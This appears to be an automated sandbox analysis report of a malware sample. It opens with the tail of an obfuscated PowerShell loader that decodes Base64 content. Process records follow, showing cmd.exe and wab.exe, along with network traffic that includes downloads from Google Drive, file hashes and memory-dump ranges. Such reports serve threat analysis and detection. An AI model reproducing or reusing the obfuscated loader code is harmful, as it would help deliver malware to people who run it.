Kodese Coadjut$SongletFHockeykoBow yparMaccabasNeedypetNe.opanr Morakkk kiftereUnhinde2 .ndlin ');Signficantly (Greaseless 'Heterom$ Phyt,ggHeadendlW.shasto spidombBygg saa Ind omlHeksame: 
Sa,ctiKexcernboNytaarsgOkkupateVirksoms BygakspMatchmarHenaandiDengsertSpkkecotUnbedfae Sorts nAmiasresMercena Skihopp=Accroac Suppler[ BelizeSSpr ngdy,roszyssPolyphot muldreKlevarem erdeop.ModpartCRameousoAffichenUomgn ev profuneModningrProgr.mt Siksak]Corfit :Bisfrak: HarehoFTrffe.irB ligydoHomacanmGulasmaBFjerndia lfactisTerceleeAgkistr6Worce.t4DopingsSLispountBirianirSul,houiSparusmnGeodt.agFalskne( Shortc$ PeriskADisobedvExpensiaFodfolknBu.lcomiSolomonaLi.iere)sekundr ');Signficantly (Greaseless 'Forplig$congealgScenefulUnblindoTvangsfbbermudaa Spade,l ,vangl:Folkl,rR CachuaiProlifegOverrassFibromerMrkningeUnder rvFrigreliVividvisProletaoFr sager Sl etrl Sj.tteoStavbaavBeinlyaeBayonnenDvelrer2Tautego Returko=.nlaure Vildsku[Unde,kuStegneseyOrganogsKinostetOutgaineKvaseh.m U.beau.LectureTclacklie,amnonixAgnyomstUnresem. PellitEAntioxinBa,talecB,llatao patterdDefineriUltrafinanthracgS.miorg]Fase um:Berl ne:Demole ASa dierSLatyrusCUnree,eI KinesiIstyrtdy.vildmndG PinchpeFyldetstAfknapsS KertertErgoterrEyeglasi psychrnLio.neagscirocc(Tensio.$Par.plyKPrepareoMo.elfogForn teeTopdelesSu.fonapUndergrrTankeeki FanebltRaillert Flerkoeisotenin SchismsFluorid)Cdgchau ');Signficantly (Greaseless 'Unmedic$compagngAn.ennelMatematoApoteksbFri.hteaUdp,ntelsuccour:TopbetjR Slgendi unexplg,ervekrsSekraftrPtilotae glennsvEntomoliSamanfesCystosyo durganruforesplFungiteo Radforv,verstaeDroschenTerras.3.amenen=Stegefe$,edsaltRImbeciliPr,gramg.tikdaas OmbrinrStrongyeRati,navBrnd,mriChastitsAsymmetog,andoar TuberclSubmucoocrackmavVkstbeteMilieubnC.illin2Hftetsb.Tr,holds,steriau Ru,egobBugspytsTramlintLitt,rtrDesillui SergelnMillen,gFravnni( Nyopre3 E fing2Frances2 Str so4 Po.ari7Equipoi2 Anpart,mismeas3Carragh1Syn.opa2Lugedes6Gos ipi1S.spect) Afsk,b ');Signficantly $Rigsrevisorloven3;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c set /A 115^^0

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 180.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.200:443 g.bing.com tcp
US 8.8.8.8:53 138.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 drive.google.com udp
NL 142.250.179.142:443 drive.google.com tcp
US 8.8.8.8:53 drive.usercontent.google.com udp
NL 142.251.36.33:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 142.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 33.36.251.142.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
NL 142.250.179.142:443 drive.google.com tcp
US 8.8.8.8:53 195.179.250.142.in-addr.arpa udp
NL 142.251.36.33:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 18.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 100.5.17.2.in-addr.arpa udp
US 8.8.8.8:53 119.110.54.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 74.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 173.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 217.135.221.88.in-addr.arpa udp

Files

memory/2968-4-0x0000013DAA840000-0x0000013DAA862000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pmwmh0cn.vnw.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2968-14-0x00007FFA4D1A0000-0x00007FFA4DC61000-memory.dmp

memory/2968-16-0x0000013DA87C0000-0x0000013DA87D0000-memory.dmp

memory/2968-15-0x0000013DA87C0000-0x0000013DA87D0000-memory.dmp

memory/2968-17-0x0000013DAAD10000-0x0000013DAAD36000-memory.dmp

memory/2968-18-0x0000013DAADA0000-0x0000013DAADB4000-memory.dmp

memory/2968-19-0x0000013DA87C0000-0x0000013DA87D0000-memory.dmp

memory/3976-20-0x00000000028A0000-0x00000000028D6000-memory.dmp

memory/3976-21-0x0000000074F10000-0x00000000756C0000-memory.dmp

memory/2968-22-0x00007FFA4D1A0000-0x00007FFA4DC61000-memory.dmp

memory/3976-23-0x0000000004F40000-0x0000000004F50000-memory.dmp

memory/3976-24-0x0000000005580000-0x0000000005BA8000-memory.dmp

memory/3976-30-0x00000000053F0000-0x0000000005412000-memory.dmp

memory/3976-35-0x0000000005C20000-0x0000000005C86000-memory.dmp

memory/3976-36-0x0000000005C90000-0x0000000005CF6000-memory.dmp

memory/3976-37-0x0000000005D00000-0x0000000006054000-memory.dmp

memory/3976-38-0x0000000006180000-0x000000000619E000-memory.dmp

memory/3976-39-0x00000000061E0000-0x000000000622C000-memory.dmp

memory/3976-40-0x00000000079D0000-0x000000000804A000-memory.dmp

memory/3976-41-0x0000000007350000-0x000000000736A000-memory.dmp

memory/3976-42-0x0000000007410000-0x00000000074A6000-memory.dmp

memory/3976-43-0x00000000073B0000-0x00000000073D2000-memory.dmp

memory/3976-44-0x0000000008600000-0x0000000008BA4000-memory.dmp

memory/3976-45-0x00000000073E0000-0x0000000007402000-memory.dmp

memory/2968-46-0x0000013DA87C0000-0x0000013DA87D0000-memory.dmp

memory/3976-47-0x0000000007680000-0x0000000007694000-memory.dmp

memory/3976-48-0x0000000004F40000-0x0000000004F50000-memory.dmp

memory/3976-49-0x00000000078E0000-0x00000000078E1000-memory.dmp

memory/3976-50-0x0000000008BB0000-0x000000000B9D0000-memory.dmp

memory/3976-51-0x0000000008BB0000-0x000000000B9D0000-memory.dmp

memory/2968-52-0x0000013DA87C0000-0x0000013DA87D0000-memory.dmp

memory/3976-53-0x0000000074F10000-0x00000000756C0000-memory.dmp

memory/3976-54-0x0000000077931000-0x0000000077A51000-memory.dmp

memory/3976-55-0x0000000004F40000-0x0000000004F50000-memory.dmp

memory/4612-56-0x0000000001200000-0x0000000004020000-memory.dmp

memory/3976-58-0x0000000004F40000-0x0000000004F50000-memory.dmp

memory/4612-59-0x0000000077931000-0x0000000077A51000-memory.dmp

memory/4612-60-0x00000000779B8000-0x00000000779B9000-memory.dmp

memory/3976-61-0x0000000004F40000-0x0000000004F50000-memory.dmp

memory/3976-71-0x0000000008BB0000-0x000000000B9D0000-memory.dmp

memory/4612-75-0x0000000000400000-0x00000000005E4000-memory.dmp

memory/3976-78-0x0000000074F10000-0x00000000756C0000-memory.dmp

memory/3976-79-0x0000000008BB0000-0x000000000B9D0000-memory.dmp

memory/2968-82-0x00007FFA4D1A0000-0x00007FFA4DC61000-memory.dmp

memory/4612-83-0x0000000000400000-0x00000000005E4000-memory.dmp

memory/4612-87-0x0000000000400000-0x00000000005E4000-memory.dmp

memory/4612-88-0x0000000001200000-0x0000000004020000-memory.dmp